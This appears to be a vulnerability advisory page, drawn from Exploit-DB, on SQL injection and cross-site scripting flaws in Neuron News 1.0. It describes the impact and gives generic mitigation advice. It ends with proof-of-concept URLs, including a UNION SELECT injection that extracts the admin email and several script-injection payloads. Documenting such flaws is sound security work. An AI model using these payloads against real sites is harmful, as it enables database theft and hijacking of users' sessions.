Neuron News Input Validation Vulnerabilities

vendor:

Neuron News

by:

7.5

CVSS

HIGH

Input Validation

CWE

Product Name: Neuron News

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Neuron News Input Validation Vulnerabilities

The Neuron News application is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and two cross-site scripting issues. These vulnerabilities exist because the application fails to sufficiently sanitize user-supplied data. An attacker can exploit these issues to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, keeping the application up-to-date with the latest patches and security fixes can help prevent exploitation.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26896/info

Neuron News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and two cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

These issues affect Neuron News 1.0; other versions may also be affected. 

http://www.example.com/patch/?q=&#039;/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*
http://www.example.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>
http://www.example.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>
http://www.example.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script>